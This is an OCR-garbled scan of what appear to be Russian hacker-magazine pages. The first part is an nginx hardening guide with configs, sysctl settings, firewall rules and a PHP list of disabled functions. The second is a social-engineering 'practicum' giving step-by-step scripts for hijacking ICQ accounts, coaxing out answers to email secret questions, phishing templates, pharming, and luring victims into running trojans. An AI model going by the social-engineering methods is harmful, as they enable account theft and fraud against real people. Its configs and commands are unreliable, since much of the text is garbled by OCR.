# ѵі /еіс/пдіпх/пдіпх.согй 

# Максимальный размер буфера для 
хранения тела запроса клиента 
с1іепД_Ъос1у_ЪиДДег_зІ2е 1К; 

# Максимальный размер буфера для 
хранения заголовков запроса клиента 
с1іепД_Ьеа<іег_ЬиД Дег_зіге 1к; 

# Максимальный размер тела запроса 
клиента, прописанный в поле СопДепД- 
ЬепдДЬ заголовка. Рели сервер должен 
поддерживать загрузку файлов, это 
значение необходимо увеличить 
с1іепД_тах_Ъос1у_зІ2е 1к; 

# Количество и размер буферов для 
чтения большого заголовка запроса 
клиента 

1агде_с1іепД_Ьеас1ег_ЪиДДегз 2 1к; 

Обрати внимание на директиву 1аг§е_с1іепі:_ 
ЬеабегДэийегз. По умолчанию, для хранения 
строки ІЖІ п§іпх вьщеляет четыре буфера, 
размер каждого из которых равен размеру 
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страницы памяти (для х86 это 4 Кб) . Буферы освобождаются каждый 
раз, когда по окончанию обработки запроса соединение переходит в со- 
стояние кеер-аііѵе. Два буфера по 1 Кб могут хранить ШИ длиной только 
2 Кб, что позволяет бороться с ботами и Бо5-атаками. Для повышения 
производительности добавь следующие строки: 

#ѵі/еІс/пдіпх/пдіпх.соп{ 

# Таймаут при чтении тела запроса клиента 
с1іепб_Ъос!у_Ьітеоиб 10; 

# Таймаут при чтении заголовка запроса клиента 
с1іепб_йеас1ег_І:ітеои1і 10; 

# Таймаут, по истечению которого кеер-аііѵе соединение с 
клиентом не будет закрыто со стороны сервера 
кеера1іѵе_Ьітеоиб 5 5; 

# Таймаут при передаче ответа клиенту 

зепб_бішеоиб 10; 

Контролируй количество 
одновременных соединений 

Для защиты ѴѴеЪ-сервера от перегрузки и попыток осуществить Бо5- 
атаку добавь в конфиг следующие строки: 

#ѵі/еІс/пдіпх/пдіпх.соггі 

# Описываем зону (зіішібз) , в которой будут храниться 
состояния сессий. Зона размером 1 Мб может хранить около 
32 0 00 состояний, мы устанавливаем ее размер равным 5 Мб 
1ішіб_20пе зіішібз $Ыпагу_гешобе_аббг 5т; 

# Задаем максимальное количество одновременных соеди- 
нений для одной сессии. По сути, это число задает макси- 
мальное количество соединений с одного ІР 
1ітіР_сопп зіітібз 5; 

Первая директива должна находиться в секции НТТР, вторая — в сек- 
ции Іосайоп. Когда количество соединений выйдет за пределы лимитов, 
клиент получит сообщение «Зегѵісе ипаѵаіІаЫе» с кодом 503. 



Разреши коннекты только к своему домену 

Взломщики могут использовать ботов для сканирования подсетей 
и поиска уязвимых ѴѴеЬ-серверов. Обычно боты просто перебирают 
диапазоны ІР-адресов в поисках открытых 80 портов и посылают запрос 
НЕАБ для получения информации о веб-сервере (или главной страни- 
це) . Ты можешь легко предотвратить такой скан, запретив обращение к 
серверу по ІР-адресу (добавить в подсекцию Іосайоп) : 

#ѵі/еІс/пдіпх/пдіпх.соггі 

іі ($Поз1і ! ~ Л (Позб . соші ѵллпл.Ьозб . сот) $ ) { 
гебигп 444 ; 

} 

Ограничь количество доступных методов обращения 
кѴѴеЬ-серверу 

Некоторые боты используют различные методы обращения к серверу 
для попытки определения его типа и/или проникновения, однако в 
документе КРС 2616 четко сказано, что ѴѴеЪ-сервер не обязан реализо- 
вывать их все, и неподдерживаемые методы могут просто не обрабаты- 
ваться. Сегодня используемыми остаются только методы СЕТ (запрос 
документа), НЕАБ (запрос заголовков сервера) и Р05Т (запрос на 
публикацию документа), поэтому все остальные можно безболезненно 
отключить с помощью помещения следующих строк в секцию зегѵег 
конфигурационного файла: 

#ѵі/еІс/пдіпх/пдіпх.соггі 

іі ($гедиезб_тебЬоб л (СЕТ | НЕАБ | РОЗТ) $ ) { 
гебигп 444; 

} 

Отшивай ботов 

Другой способ блокирования ботов, сканеров и прочей нечисти 
основан на определении типа клиента (шег-а^епі:) . Он не слишком эф- 
фективен, потому как большинство ботов косят под вполне легитимные 
браузеры, но в ряде случаев остается полезным: 



► 130 
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1««1ІВП / { 
ргвху_рмі 
рг«^_ггііг«і 



ргг; 



рг'ЛѴѴ_ійЕ_ГЧМ^4Г №11 Шш; 

ргсі:г_%*І_Ншк,г Х-КадІ-ІР и»М_***] 
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С 1 1 ГП С._Д*йЛ_Ьк?)Р_1 1 Ей 
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р1‘еед в ^ч1»р^иН#г& п &1 гі 
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І2&; 

! ні*_Ыи*у_Е^р' 



№ 

іабоо? 

4к; 

і МЫ 
Ці 



і»геігу.„ін_Тт1с_ѵггі(-с_ііг« бЛсг 
ргвху_г*щр_ркИ ^ѵѵ/пдігк/^гйку.сй 

скійгіяХ; кйіі-г; 



3 



•г'гег'^дйі № /401.ЫІРІ; 

ІОС1ІТЕН1 /«ГНіШІ { 
гм: /к|нкі1/имрм; 



Конфигурируем пдіпх 

# ѵі /еІс/пдіпх/пдіпх.сопГ 

# Блокируем менеджеры загрузки 
ІІ: ( $Ь.Вкр_изег_адепВ ~* 

ШР : : Зішріе I ВВВіке I ѵ^деВ ) { 
гекшгп 403 ; 

} 

# Блокируем некоторые типы ботов 
іі ( $ЬВбр_изег_адепВ ~* 
тзпЬоВ I зсгарЬоб ) { 

гебигп 403 ; 

} 

Блокируй Ре?еггег-спам 

Если твой сайт публикует ѴѴеЪ-логи в общедо- 
ступном виде, ты легко можешь стать жертвой 
Кеіеггег-спама (когда спам-боты обращаются 
к твоему серверу, указывая в заголовке геіеггег 
— адрес рекламируемого сайта) . Такой вид 
спама может легко испортить ЗЕО-рейтинги 
интернет-страницы, поэтому его необходимо 
блокировать в обязательном порядке. Один 
из способов сделать это — занести наиболее 
частые слова, встречающиеся в адресах рекла- 
мируемых сайтов, в черный список. 

# ѵі /еіс/пдіпх/пдіпх.соггі 

# Секция зегѵег 

іб ( $Ъ.ккр_геіегег ~* (ЬаЬез I іогзаіе 



I дігі | з еѵ^еігу | Іоѵе I пибіб I огдапіс I р 
окег | рогп | зех | Рееп) ) 

{ 

гекигп 403 ; 

} 

Блокируй хотлинк 

Хотлинк — это включение в страницу изобра- 
жения (или иного контента) с другого сайта. 
По сути, это воровство, потому как изображе- 
ние, на которое ты потратил не один час своего 
свободного времени, не только свободно 
используется другими, но и создает нагрузку 
на твой ѴѴеЪ-сервер, не приводя на него посе- 
тителей. Для борьбы с хотлинками достаточно 
сделать так, чтобы изображения отдавались 
клиенту только в том случае, если он запросил 
их, уже находясь на сайте (другими словами, 
заголовок геіеггег-запроса должен содержать 
имя твоего сайта) . Добавь в секцию зегѵег кон- 
фигурационного файла п^іпх.сопі следующие 
строки (Ьози.сот — это адрес твоего сайта) : 

#ѵі /еіс/пдіпх/пдіпх.соггі 

Іосабіоп /ішадез/ { 

ѵа1іб_ге^егегз попе Ыоскеб ѵлапаг. 
козк . сош козк . сот; 

іб ( $іпѵа!іб_ге^егег ) { 
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Кастомную сборку пдіпх для 
РгееВБй можно провести, ис- 
пользуя систему портов 



гекшгп 403 ; 

} 

} 

В качестве альтернативы ты можешь 
настроить сервер на отдачу специального 
баннера с сообщением о воровстве вместо 
запрашиваемого изображения. Для этого 
замени строку «гешгп 403» на строку: 

гешгіке л / ішадез /иріоабз . * \ . 

(діб | зрд | зред I рпд) $ кВВр : / /шт. 
козб . сош/Ьаппеб. зрд Іазб 

Защищай важные каталоги от 
посторонних 

Как и любой другой ѴѴеЪ-сервер, п^іпх позво- 
ляет регулировать доступ к каталогам на 
основе ІР-адресов и паролей. Эту возможность 
можно использовать для закрытия некоторых 
частей сайта от посторонних глаз. Например, 
для отрезания ШИ от внешнего мира: 

#ѵі /еіс/пдіпх/пдіпх.соггі 

Іосабіоп /иріоабз/ { 

# Разрешаем доступ только машинам 
локальной сети 

аііо™ 192.168.1.0/24; 

# Отшиваем всех остальных 
бепу аіі; 

} 

Теперь к документам каталога иріоасіз будут 
иметь доступ только пользователи локальной 
сети. Для установки пароля придется проделать 
более сложные действия. Сначала необходимо 
создать приватный для п§іпх-файл паролей и 
добавить в него необходимых пользователей (в 
качестве примера добавим пользователя абтіп) : 

# тксііг /екс/пдіпх/ .Ькраззѵлі 

# ЪВраззмсІ -с /екс/пдіпх/ .Ькраззѵлі/ 
раззмсі асітіп 

Далее открой файл п^іпх.сопі и впиши в него 
следующие строки: 

#ѵі /еіс/пдіпх/пдіпх.соггі 

ІосаВіоп /асітіп/ { 
аиВІі_Ьазіс "КезВгісВесІ" ; 



О герое дня 

]Ѵ§іпх — один самых производительных и популярных ѴѴеЪ-серверов в мире. 
Согласно данным №*сгаН:, он используется для поддержки более чем 12 миллионов 
ѴѴеЬ-сайтов по всему миру, включая таких мастодонтов как КатЫег, Ѵапсіех, 
Ве&ші, УУогйргезз.сот. ѴѴгіке, 5оигсеГог%е.пе1:, ѵкопіакіе.ги. те^азЬага.сот. Либ- 
русек и ТаЬа.ги . Грамотная архитектура, основанная на мультиплексировании 
соединений с помощью системных вызовов веіесі:, ероіі (Ііпих), кциеие (РгееВЗБ) 
и механизме управления памятью на основе пулов (небольших буферов от I до 
16 Кб), позволяет п§іпх не проседать даже под очень высокими нагрузками, вы- 
держивая свыше ІО ООО одновременных соединений (так называемая проблема 
СюК). Изначально написан Игорем Сысоевым для компании КатЫег и открыт в 
2004 году под В$0-подобной лицензией. 
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пдіпх в репозитории ІІЬипІи 



аикк_Ъазіс_изег_кі1е /екс/пдіпх/ . ккраззжі/раззжі; 
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} 



Настраиваем РНР 



Новых пользователей можно добавить с помощью следующей команды: 

# Ь.краззж1 -з /екс/пдіпх/ .йкраззжі/раззѵгсі пользователь 

Используй 551 

Если твой сайт работает с приватными данными пользователей, такими 
как номера кредитных карт, пароли от других сервисов, или же предо- 
ставляет доступ к другой важной информации, которая может стать 
лакомым кусочком для третьих лиц, позаботься о шифровании. Ы^іпх 
хорошо работает с 55Ь, и этой возможностью нельзя пренебрегать. Для 
настройки ЗЗЬ-шифрования средствами п§іпх достаточно выполнить 
несколько простых шагов. Сначала ты должен создать сертификат: 

# сб /екс/пдіпх 

# орепззі депгза -безЗ -оик зегѵег.кеу 1024 

# орепззі гед -пеѵ? -кеу зегѵег.кеу -оик зегѵег.сзг 

# ср зегѵег.кеу зегѵег . кеу . огд 

# орепззі гза -іп зегѵег . кеу . огд -оик зегѵег.кеу 

# орепззі х509 -гед -бауз 365 -іп зегѵег.сзг \ 

-зідпкеу зегѵег.кеу -оик зегѵег. сгк 

Затем описать сертификат в конфигурационном файле п§іпх: 

# ѵі/еіс/пдіпх/пдіпх.соггі 

зегѵег { 

зегѵег_пате іюзк . сот; 

Іізкеп 443 ; 
ззі оп; 

зз1_сегкікісаке /екс/пдіпх/зегѵег . сгк ; 
зз1_сегкікісаке_кеу /екс/пдіпх/зегѵег . кеу; 
ассезз_1од /екс/пдіпх/ Іодз/ззі . ассезз . Іод; 
еггог_1од /екс/пдіпх/іодз/ззі . еггог . Іод; 

} 

После этого можно перезагрузить ѴѴеЪ-сервер: 



пек . ірѵ4 . істр_есЪ.о_ідпоге_Ъгоабсазкз = 1 

# Защита от неправильных ІСМР- сообщений 

пек . ірѵ4 . істр_ідпоге_Ьодиз_еггог_гезропзез = 1 

# Защита от ЗУЫ-флуда 

пек . ірѵ4 . кср_зупсоокіез = 1 

# Запрещаем маршрутизацию от источника 
пек . ірѵ4 . сопк . аіі . ассерк_зоигсе_гоике = 0 
пек . ірѵ4 . сопк . бекаиік . ассерк_зоигсе_гоике = 0 

# Защита от спуфинга 

пек . ірѵ4 . сопк . аіі . гр_кі1кег = 1 
пек . ірѵ4 . сопк . бекаиік . гр_кі1кег = 1 

# Мы не маршрутизатор 
пек . ірѵ4 . ір_когѵ7агб = 0 

пек . ірѵ4 . сопк . аіі . зепб_гебігескз = 0 
пек . ірѵ4 . сопк . бекаиік . зепб_гебігескз = 0 

# Включаем ЕхесЗЕіеІб 
кегпеі . ехес-зкіеіб = 1 
кегпеі . гапботіге_ѵа_зрасе = 1 

# Расширяем диапазон доступных портов 

пек . ірѵ4 . ір_1оса1_рогк_гапде = 2000 65000 

# Увеличиваем максимальный размер ТСР-буферов 
пек . ірѵ4 . кср_гшеш = 4096 87380 8388608 

пек . ірѵ4 . кср_жпет = 4096 87380 8388608 

пек . соге . гтет_тах = 8388608 

пек . соге . ѵшпет_тах = 8388608 

пек . соге . пекбеѵ_тах_Ьаск1од =5000 

пек . ірѵ4 . кср_міпс1оѵ\г_зса1іпд = 1 

Размести корневой каталог 
ѴѴеЬ-сервера на выделенном разделе 

Поместив корневой каталог ѴѴеЪ-сервера в выделенный раздел и 
запретив на нем размещение любых исполняемых файлов и файлов- 
устройств, ты обезопасишь остальную часть системы от тех, кто сможет 
получить доступ к корню ѴѴеЪ-сервера. При этом запись в файле /еХ.с/ 
ізііаЪ должна иметь примерно такой вид: 



# /екс/іпік . б/пдіпх геіоаб 

Естественно, без поддержки со стороны самого ѴѴеЪ-сайта это делать 
бессмысленно. Другие способы: установи правильные значения 
системных переменных. Открой файл /епс/зузсіі.сопі и помести в него 
следующие строки: 

# ѵі /еіс/зубсіі.соггі 

# Защита от зшигк-атак 



/беѵ/зба5 /пдіпх ехк4 бекаиікз ,позиіб, поехес , побеѵ 1 2 

Помести пдіпх в сіігооі/іаіі-окружение 

Любая современная *піх-система позволяет запереть приложение в 
изолированной среде исполнения. В Ілпих для этого можно использо- 
вать технологии КѴМ, Хеп, ОрепѴ2 и ѴЗегѵег, во ЕгееВЗБ — Л аіі, в Зоіагіз 
— 2опез. Если ни одна из этих технологий не доступна, ты можешь 
поместить п^іпх в классический сЬгоон, который хоть и намного более 
хрупок, но большинство взломщиков остановить сможет. 
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# Занята &г зтугг-лт^.* 

пен Лрѵ4, ! ст^_^<КіР_1 д^і-о і-й- ^ і-олсіс *■= ■ 1 

# ’аіиіта йтг мепрлшпьнм* хеш 3 -еойбшеиий 

л с & * Ъ рѵА , і сщ?-Ь впо гч^-зяу* _* г гог^г с ншгк *і - і 

# ^ іиііга от 5ѵТІ -флуіл 

л*Ь. Ірѵ4. бср^ьугісоокі-еі ■ 1 

ё !лре*цлем илрырутиз яцііЮ 1 от источника 

тгЛрД^опі^.ііН^сс+ргиів-игсі^гішм ■ о 

ЛрЛ н гоп^ іі^гіііі^ іс^_?а^сіг_гйи^ » О 

# 34И#1Т4 йтг оі»уфикга 

ц«/^4 + се^Г.аі1*рр^И**г - 1 
оесПрѵ4 + сеп^.^*^*ии*гр-іНІіЕ*г - I 

I Ми нс илршрушллтор 

п*и г Ір ь - 4 ,. і р„Гр г*м Г4І - о 

п#?. ір^4^йпг Р іі 1 , 5 *пй_Р4й 1 ге«і * -О 

п-е с . I рѵ4 , с опіг . <і* гіи 1 ^ ь і е п-й_г«й1 г«с {т » О 

# &КЛрСНА«и Е*СС&М4ІСІ 

кцггѵеі ,* - X 

I * гп-с 1 . г дгъйолИ г*_ѵ т- 5 расе - 1 

# Расширяем дидп-аэлн доступных портов 

пН. Ірѵ4. ^ р.1асй1 и рт и гіпді • Ю'ІО' йЗООй 

# Увеличив асы иаѵеыылльныгі раэиер ТСР-буферан 

пеК.Ірѵ4,сср_™нп - 4ЯЯй Е7 = 2С ВШЕГСВД 
пчі-|-. 1рд4, ігЕ;р_иіэдеті » 40^6 

п*^свг*н * нівУйОУ 

пе с , со і г е . пени 1 * і - ■ Й 399М? 
п^.Сй^с.Пй^-Сн-ла^кіКИйд - 5000 
пе с г і ру 4 , с ср_ці в сііі ид ■ 1 

Изменяем системные переменные 
Установи правила БЕЫпих для защиты пдіпх 

Хорошей альтернативой изолированным средам исполнения являются 
локальные системы обнаружения и предотвращения вторжений, такие 
как 5ЕІІП11ХИЛИ АррАгтог. Будучи правильно настроенными, они смо- 
гут предотвратить попытки взлома ѴѴеЪ-сервера. По дефолту ни одна из 
них не настроена для работы в связке с п^іпх, однако в рамках проекта 
5Е1лпихП§іпх ( Ьнр://5І.пеі:/ргоіесЩ/5е1іпихпщпх/ ) были созданы пра- 
вила для ЗЕІіпііх, которые может использовать любой желающий. 

# Саг — 2 хѵ С зе-пдіх_1_0_10 . Саг . дз 

# ссі зе-пдіх_1_0_10 /пдіпх 

# таке 

# /изг/збіп/зетобиіе -і пдіпх. рр 

Настрой брандмауэр 

Обычно п^іпх устанавливают на выделенных машинах, готовых к 
высокой нагрузке, поэтому зачастую он остается единственным 
сетевым сервисом, работающим на сервере. Чтобы обезопасить 
сервер, достаточно создать совсем небольшой набор правил, которые 
будут открывать 80, 110 и 143-й порты (если, конечно, п^іпх должен 
работать еще и как ІМАР/РОРЗ-прокси) . 

Ограничь количество соединений 
с помощью брандмауэра 

Для не слишком нагруженного ѴѴеЪ-сайта хорошей идеей будет ограни- 
чить количество попыток соединений с одного ІР-адреса в минуту. Это 
сможет уберечь тебя от некоторых типов БоЗ-атак и брутфорса. В Ііпих это 
можно сделать с помощью стандартного іртЫез/пеііікег-модуля зщие: 

# іркаЫез -А ШРІЛ 1 -р кср --брогк 8 0 -і екЪ.0 \ 

-ш зкаке --зкаке ЫЕМ -т гесепк --зек 

# іркаЫез -А ШРІІТ -р кср --брогк 8 0 -і екПО \ 

-т зкаке --зкаке ЫЕМ -т гесепк --ирбаке \ 

--зесопбз 60 --Мксоипк 15 -] БКОР 

Правила урезают лимит на количество подключений с одного ІР в мину- 
ту до 15. То же можно сделать и с помощью рі: 



#ѵі/еІс/рЕсоггі 

отеЪзегѵег_ір= " 1 . 1 . 1 . 1 " 
каЫе <аЬизе> регзізк 
Ыоск іп диіск кгот <аЬизе> 

разз іп оп $ехк_ік ргоко кср ко $тлеЪзегѵег_ір \ 
рогк шт кіадз 8/ЗА кеер зкаке \ 

(шах-згс-сопп 100, шах-згс-сопп-гаке 15/60, \ 
оѵегіоасі <аЬизіѵе_ірз> кіизк) 

Кроме лимита на количество последовательных подключений 
(15 в минуту) данное правило устанавливает дополнительный ли- 
мит на количество одновременных подключений равный 100. 

Настрой РНР 

Если ты используешь п§іпх в связке с РНР, не забудь настроить и его. 
Вот как должен выглядеть конфигурационный файл /еіс/рЬр/рЬр.іпі 
защищенного сервера: 

#ѵі/е(с/рИр/рИр.іпі 

# Отключаем опасные функции 

бізаЫе_кипскіопз = ркріпко, зузкет, таіі, ехес 

# Максимальное время исполнения скрипта 
тах_ехесикіоп_кіте =30 

# Максимальное время , которое может потратить скрипт на 
обработку данных запроса 

шах_іприк_кіше =60 

# Максимальное количество памяти, выделяемое каждому 
скрипту 

тетогу_1ітік = 8М 

# Максимальный размер данных, отсылаемых скрипту с помо- 
щью метода РОЗТ 

розк_шах_зізе = 8М 

# Максимальный размер загружаемых файлов 
ир1оаб_тах_кі1езІ2е = 2М 

# Не показывать ошибки РНР-скриптов пользователям 
бізр1ау_еггогз = Окк 

# Включаем Заке Мобе 
заке_тобе = Оп 

# Включаем 8<2Ь Заке Мобе 
зді . заке_тобе = Оп 

# Позволяем выполнять внешние команды только в этом ка- 
талоге 

заке_тобе_ехес_біг = /путь/к/ защищенному /каталогу 

# Защищаемся от утечки информации о РНР 
ехрозе_рПр = Окк 

# Ведем логи 
1од_еггогз = Оп 

# Запрещаем открытие удаленных файлов 
а11ом_иг1_кореп = Окк 

ВЫВОДЫ 

Применив описанные в статье рекомендации, ты получишь го- 
раздо более защищенный ѴѴеЪ-сервер. Но имей в виду, что не все 
техники подойдут к твоей конфигурации. Например, защита от 
брутфорса, основанная на урезании размеров буферов, выделя- 
емых п^іпх под обработку запросов клиентов, может привести к 
падению производительности, а в некоторых случаях и к сбоям в 
обработке запросов. Ограничение на количество подключений 
нанесет сильный удар по производительности даже среднена- 
груженного ѴѴеЬ-сайта, но принесет пользу, если страница имеет 
низкий поток посетителей. Всегда проверяй, как внесенные тобой 
изменения повлияли на производительность и общую работоспо- 
собность ѴѴеЪ-страницы. т 
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ІЛЧІТ5 



Оксана «Огіуапа» Андреева огіуапаШхрзусНо.ги 




Р8УСН0: 

СОЦИАЛЬНЫЙ ИНЖЕНЕР — 
ВСЕМ ХАКЕРАМ ПРИМЕР! 

Практикум по социальной инженерии 



Многиетру-хакеры, постоянно занимающиеся взломами, всегда 
имеют в запасе пару приемчиков СИ, ведь там, где невозможно 
найти уязвимость в коде, ее часто можно найти в головах службы 
поддержи или владельца е-таіі’а, I СО или сайта... 



От теории к практике 

Что такое социальная инженерия, ты уже читал 
в одном из предыдущих номеров любимого жур- 
нала, так что можно смело сказать, что матчасть 
освоена успешно. Теперь предлагаю проехаться 
по практике. 

Социальные инженеры — очень приятные в 
общении люди: культурные, приветливые, с 
отличным чувством юмора. У них потрясающе 
гибкий ум, нестандартное мышление и масса 
идей по поводутого, какэффективнее достиг- 
нутьсвоих целей. Именно кним я обратиласьза 
помощью при подготовке материала. Нашими 
консультантами буд^т СоосЮосІ — создатель 
одного из наиболее популярных русскоязычных 
проектов о социальной инженерии зосіаіѵѵаге.ги : 
Ауиті ( зрѵІаЬз.огд ): Иван — еще один мастер 
взлома человеческих мозгов, пожелавший 
остаться инкогнито. 

Поехали! 

Угон номера ІСО 
(без ргітагу е-таіі) 

Для угона ІСОтебе понадобятся: 

• списокдоменов сзарегистрированными 
на нихе-таіГами (каких получить — читай в 
декабрьском номере ][за 2009 год, видео «Мас- 
совый угон доменов» от ОоосІОосІ] ; 

• номер ІСО, с которого будет происходить на- 
чальная атака; 

• номер ІСО, оформленный подспециалиста 5Е0 
(с соответствующими данными и реквизитами 

в инфе]. 

Итак, «оружие» есть, переходим катаке. За- 



цепи вниманиежертвы: например, подойдет 
ситуация, будто ты перепутал ее с кем-то другим. 
После этого можно извиниться и завязать 
непринужденный разговор, понемногу рас- 
кручивая на доверие. Пусть пройдет некоторое 
время, чтобы она (жертва] ктебе привыкла. 
Далее разговор переводится на тему заработ- 
ка — рассказываешь, что ты зарабатываешь 
в Сети (пока не говори, как именно, чтобы не 
спугнуть собеседника]. Через какое-то время 
скажи отом, что друг, занимающийся раскруткой 
сайтов, предложил тебе шаровую работу: особо 
ничего делать не нужно, но каждый день капает 
около 200 рублей. Если жертва сама не проявит 
инициативу, то сделай шаг первым и предложи 
познакомиться с другом. Сразу незахочетзнако- 
миться — на время прекрати этот разговор, по- 
скольку если сильно давить, эффект может быть 
обратным; лучше вернись к этому чуть позже под 
другим предлогом. 

Кстати, если жертва от природы стеснительна, 
ты незаставишьее пойти на контакте незна- 
комцем, поэтому придется заняться «сводни- 
чеством», чтобы знакомство все же состоялось. 

И вот, клиент обращается кдругу-сеошнику (то 
есть, ктебе]. Вначале прояви здоровое недо- 
верие, задавая вопросы типа «Откуда Вы узнали 
о проекте? От Саши? Ааа, Саша... Да, помню. Ок, 
сейчас расскажу суть работы». Далее расскажи 
о проекте ІСОЗеагсЬ, продвижении сайтов, 
опиши варианты оплаты (200 рублей вдень или 
1400 в неделю — пусть сам выберетудобный 
для него вариант). Постоянно сосредотачивай 
внимание «клиента» на реалистичных деталях, 



такты отвлечешь его от ненужных размышле- 
ний. Чем интенсивнее атака и больше новой 
информации, тем меньшеу него времени 
обдумать происходящее. Наконец, опиши схему 
заработка: пусть он выберет сайт из списка, за- 
готовленного вначале, через ѵѵбоіз глянетмейл, 
к которому привязан сайт (пусть сделает это сам] 
и впишетего в поле«Е-таіІ» в профиле ІСО. 
Обязательно объясни, что если в данных аськи 
и домена указан один и тот же е-таіі, тогда чем 
чащеася ищется в поиске, тем выше рейтинг 
сайта в поисковике. Как то ль ко жертва заверши- 
ла привязку, делаешь восстановление пароля на 
указанный е-таіі, и Ю I N твой ! 

Если же пароль не приходит на е-таіі, значит, 
у номера уже есть праймари мейл, и угон нужно 
организовывать другим способом. 

Взлом почты 

УЗНАЕМ ОТВЕТ НА СЕКРЕТНЫЙ ВОПРОС 

Вопросы на почтовых серверах, какправило, 
достаточно однотипные: 

• Девичья фамилия матери; 

• Любимое блюдо; 

• Кличка домашнего питомца; 

• Номер паспорта; 

•Личный вопрос (имя первого учителя; индекс; 
любимый фильм; любимый исполнитель). 

На такие, как«Любимое блюдо» или «Кличка со- 
баки», ответ можно подобрать самостоятельно, 
имея хорошую интуицию. Еслиже интуиция — не 
главный твой конек, или вопрос подразумевает 
более конкретные знания, тогда придется 
потрудиться. Для начала собираем как можно 
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больше информации о владельце ящика. Очень 
желательно номер ІСО или страницу «В контак- 
те». Потом добавляемся кжертве в контакт-лист, 
знакомимся подлюбым предлогом (тутнам при- 
годится вся собранная информация] и начинаем 
«атаку» по выведыванию нужного нам ответа на 
секретный вопрос. На этом этапе главное — не 
торопись, все должно быть последовательно и 
естественно, так, чтобы ужертвы не закралось 
никаких подозрений. 

Какие схемы срабатывают? Девичья фамилия 
матери — заводи тему о генеалогическом дереве 
или о том, какая забавная была фамилия у твоей 
мамы до брака. Любимое блюдо — тут все понят- 
но. Кличка животного — разговор о питомцах: 
прошлых, настоящих и будущих, так как кодовым 
словом можетбыть кличка первого подаренного 
хомячка. С номером паспорта будет сложнее. Тут 
можно соблазнить на покупку недорогого дефи- 
цитного товара, например, который доставляют 
соплатой по факту, но для оформления заказа 
нужны паспортные данные и идентификацион- 
ный код. Имя первого учителя можноузнатьу 
одноклассников жертвы, или поговорить с ней 
непосредственно о любимыхучителях; индекс 
проще получить, скачав базы города, а ужертвы 
просто узнать, в каком районе она живет. Тут 
главное — смекалка, фантазия итерпение. 

Есть один небольшой, но важный нюанс. Иногда 
при вопросе «Любимое блюдо» ответом может 
быть, например, номертелефона.то есть, полное 
несоответствие вопроса и ответа. Здесьтебе 
придется заводить разговор о нелепых сочета- 
ниях и бессмысленности секретных вопросов, а 
потом начинать всезаново, желательноуже под 
другим аккаунтом. 

ОБРАЩЕНИЕ В СЛУЖБУ ПОДДЕРЖКИ 

Этотспособ болеетрудоемкий и стремный, но 
нужен в том случае, если жертва никак не хочет 
«колоться», или если ящик «мертвый», то есть 
хозяин давно на него не заходит. Для этого 



иди на страницу службы поддержки нужного 
почтового сервиса и пиши письмо с просьбой 
восстановить украденный пароль. С тебя, скорее 
всего, потребуютимя, фамилию (илите данные, 
которые были указаны при регистрации], дату 
рождения, приблизительную дату регистрации 
ящика (хотя бы год]. Поэтому постарайся узнать о 
жертве и ее ящике как можно больше сведе- 
ний. В этом тебе помогут поисковые системы, 
социальные сети и блоги. 

ФИШИНГ 

Один из самых эффективных способов по- 
лучения пароля, причем хозяин об этом даже 
не узнает. Жертве предлагается ссылка, по 
которой нужно перейти и ввести свой логин и 
пароль. Эти да иные отправляются в файл отчета, 
базу данных (если угон массовый) или на почту. 
Основная премудрость состоит в том, чтобы 
за ста вить жертву перейти по этой ссылке. Форма 
м ожет б ыть ка ко й у год н о : 

• Сообщение«отадминистрации» (читай: с почто- 
вого сервиса с подменой адреса) о спаме с данного 
ящика. Пример: «Уважаемый пользователь, (имя 
пользователя]! На Ваш аккаунт поступили жалобы 
на спам, в связи с чем администрация имеетправо 
временно приостановить или заблокировать его 
работу. Вполне возможно, что к нему получили до- 
ступ злоумышленники. Чтобы подтвердить принад- 
лежностьаккаунта, пройдите повторную авториза- 
цию по этой ссылке (гиперссылка на фейк]. Если в 
течение 5 дней подтверждения не будет, почтовый 
а ккау нт будет за бл о ки ро ва н . С у важе н и е м , служба 
поддержки (название почтового сервиса]». Игра на 
страхе потери ящика. 

• Зная обувлеченияхжертвы, можно взять на 
интерес. Например, письмо с интересующей 
темой, в которой освещена только часть инфор- 
мации, все остальное — при переходе по ссылке. 
Ссылка ведет на псевдостраницу авторизации, и 
прочитать остальную информацию можнотолько 
залогинившись. 



Пример: «Только 1 5-17 августа 2010 года в (го- 
род жертвы] проходит практический тренинг 
по 100% эффективному построению межполо- 
вых отношений! Впервые откроются безотказ- 
ные секреты сексуальности и привлекательно- 
сти, часть из которых Вы можете увидеть здесь 
(гиперссылка]. Остальное — на тренинге. И не 
забывайте, что теория — это всего лишьтео- 
рия. Научиться всему вы сможете на практике. 
Проводиттренингавтор Егор Асин (гиперссыл- 
ка]. Для тех, кто зарегистрируется до 10 августа 

— первое занятие бесплатно. Для регистра- 
ции заполните эту форму (гиперссылка]». 

Все гиперссылки ведут на фейковую страницу 
авторизации почтового сервера жертвы. Дальше 

— редиректна сайте информацией. 

ФАРМИНГ 

Бывает и такое, что жертва достаточно умна (или 
пофигистична), чтобы не переходить по ссыл- 
кам. В этом случаетебе придется прибегнуть к 
помощи троя нов/джой неров/скриптов для ма- 
нипуляции с файлом Н05Т5, либо взломать Б N5 
или ОНСР-сервер ее провайдера. При этом, ког- 
да юзер заходит на сайт, чтобы проверить е-таіі, 
происходит перенаправление на точно такой 
же, только фишинговый. Ничего не подозревая, 
пользователь вводитсвои данные и при помощи 
скрипта внутренней авторизации попадает в 
свою «родную» почту, а логин и пароль попадают 
ктебе на почту. Вся прелесть в том, что жертва 
даже не догадывается о произошедшем. 

Как впарить троян 

Всеми нами любимые программы-«лошадки», 
они так просты в создании и так результативны 
при получении доступа к чужому компьютеру. 
Минус втом, что сами они не распространяются. 
Их нужно «впаривать». Именно в этот момент 
многие хакеры начинаютосознавать пользу 
социальной инженерии. Давай рассмотрим не- 
которые наиболее популярные способы. 
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Подобно кукловоду, опытный 
социнженер играетна 
человеческих слабостях 
и стереотипах 

нестандартно выгляжу. У меня есть одна деталь, 
которая очень нравится парням». Что конкретно 
ты «имела» в виду, пусть думает уже после того, 
кактроянский конь вырвался на волю и пасется 
в его системе. Обязательно попроси фото 
взамен, чтобыу него не возникло сомнений (или 
ощущения невостребованности :)). Играем на 
интерес + сексуальное желание. 

3. Красимся в блондинку. 

Подвидом симпатичной девушки-ламера идем 
в чат или на форум, и жалуемся, что ну никак не 
получается разобраться в новой программе, 
которую недавно скачал старший брат. Беда в 
том, что братуехал в свадебное путешествие, а 
тебетак не хочется отвлекать его. Программа 
обязательно должна быть малоизвестной и 
интригующей. Пусть это будет генератор кодов 
пополнения мобильного или интернет-счета, 
например. Обязательно найдется куча умников, 
желающих помочь красивой и глупой девушке. 
